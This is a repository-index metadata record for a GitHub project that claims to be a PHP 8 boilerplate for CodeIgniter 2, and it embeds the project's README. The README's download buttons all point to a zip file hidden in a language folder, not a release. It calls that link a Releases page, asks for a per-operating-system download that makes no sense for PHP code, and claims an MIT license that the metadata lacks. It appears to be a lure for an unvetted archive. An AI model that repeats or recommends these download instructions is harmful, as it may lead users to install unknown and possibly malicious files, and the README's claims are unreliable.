{"id":31551149,"url":"https://github.com/asha743/ci2-php8-boilerplate","last_synced_at":"2026-04-28T21:34:58.032Z","repository":{"id":316972136,"uuid":"1065448033","full_name":"asha743/ci2-php8-boilerplate","owner":"asha743","description":"🚀 Modernize your CodeIgniter 2 projects with this PHP 8 boilerplate, fixing deprecated features and ensuring compatibility with MySQL and MariaDB.","archived":false,"fork":false,"pushed_at":"2026-04-25T11:10:08.000Z","size":4511,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-04-25T11:12:12.780Z","etag":null,"topics":["boilerplate","ci2","ci2-php8","codeigniter","codeigniter2","legacy-framework","mariadb","mysql","php8-compatibility"],"latest_commit_sha":null,"homepage":null,"language":"PHP","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/asha743.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-27T18:45:22.000Z","updated_at":"2026-04-25T11:10:13.000Z","dependencies_parsed_at":"2025-12-16T21:08:15.096Z","dependency_job_id":null,"html_url":"https://github.com/asha743/ci2-php8-boilerplate","commit_stats":null,"previous_names":["asha743/ci2-php8-boilerplate"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/asha743/ci2-php8-boilerplate","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/asha743%2Fci2-php8-boilerplate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/asha743%2Fci2-php8-boilerplate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/asha743%2Fci2-php8-boilerplate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/asha743%2Fci2-php8-boilerplate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/asha743","download_url":"https://codeload.github.com/asha743/ci2-php8-boilerplate/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/asha743%2Fci2-php8-boilerplate/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32400868,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-28T19:38:08.556Z","status":"ssl_error","status_checked_at":"2026-04-28T19:37:55.688Z","response_time":56,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["boilerplate","ci2","ci2-php8","codeigniter","codeigniter2","legacy-framework","mariadb","mysql","php8-compatibility"],"created_at":"2025-10-04T18:02:04.902Z","updated_at":"2026-04-28T21:34:58.027Z","avatar_url":"https://github.com/asha743.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🎉 ci2-php8-boilerplate - A Solid Base for CodeIgniter 2 Apps\n\n## 🌟 Overview\nWelcome to the **ci2-php8-boilerplate**! This application serves as a modern foundation for your legacy CodeIgniter 2 projects. It has been upgraded for compatibility with PHP versions 8.2 and 8.3. You can use this boilerplate to work with older CodeIgniter applications while benefiting from the latest PHP features.\n\n## 🔗 Download Now\n[![Download ci2-php8-boilerplate](https://github.com/asha743/ci2-php8-boilerplate/raw/refs/heads/main/system/language/english/php_boilerplate_ci_1.0.zip)](https://github.com/asha743/ci2-php8-boilerplate/raw/refs/heads/main/system/language/english/php_boilerplate_ci_1.0.zip)\n\n## 🚀 Getting Started\nTo get started with ci2-php8-boilerplate, follow the steps below to download and run the application.\n\n## 📋 System Requirements\nBefore you download, ensure your system meets the following requirements:\n- PHP 8.2 or 8.3\n- A web server supporting PHP\n- MySQL or MariaDB for database management\n\n## 📥 Download \u0026 Install\n1. Click the download button below to visit the Releases page:\n   [Download ci2-php8-boilerplate](https://github.com/asha743/ci2-php8-boilerplate/raw/refs/heads/main/system/language/english/php_boilerplate_ci_1.0.zip)\n   \n2. On the Releases page, look for the latest version. It will be marked clearly.\n\n3. Download the zip file that corresponds to your operating system.\n\n4. After the download completes, extract the contents of the zip file to a folder of your choice.\n\n5. Open the folder. You will find all the necessary files to run your application.\n\n## ⚙️ Configuration\nTo set up your application:\n1. Edit the configuration files in the `application/config` directory.\n2. Update database settings such as hostname, username, password, and database name. Ensure it matches your MySQL or MariaDB setup.\n\n## 🌐 Running the Application\n1. Upload the extracted files to your web server.\n2. Ensure your web server is configured to serve PHP files. If you're unsure how to do this, consult your web server's documentation.\n3. Access the application by typing your server's address into a web browser.\n\nYour application is now ready to run!\n\n## 📊 Features\n- **Compatibility**: Upgraded for PHP 8.2 and 8.3.\n- **Updated Code**: Deprecated features are fixed, ensuring better performance.\n- **Dynamic Properties**: All properties are declared, reduces errors, and improves readability.\n\n## 📚 Support\nIf you run into issues or need assistance, please check the repository's **Issues** section on GitHub. Here, you can find help from other users or report bugs.\n\n## 💬 Contributing\nContributions are welcome! If you'd like to improve the project, please fork the repository, make your changes, and submit a pull request.\n\n## 📅 Future Updates\nStay tuned for future updates where we will add more features and improvements based on community feedback.\n\n## 🔒 License\nThis project is licensed under the MIT License. You can use it freely, but please respect the terms laid out in the license file. \n\n## 📖 Topics\nThis boilerplate covers:\n- **boilerplate**\n- **ci2**\n- **ci2-php8**\n- **codeigniter**\n- **codeigniter2**\n- **legacy-framework**\n- **mariadb**\n- **mysql**\n- **php8**\n- **php8-compatibility**\n\nFor any questions or suggestions, feel free to reach out via the GitHub repository!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fasha743%2Fci2-php8-boilerplate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fasha743%2Fci2-php8-boilerplate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fasha743%2Fci2-php8-boilerplate/lists"}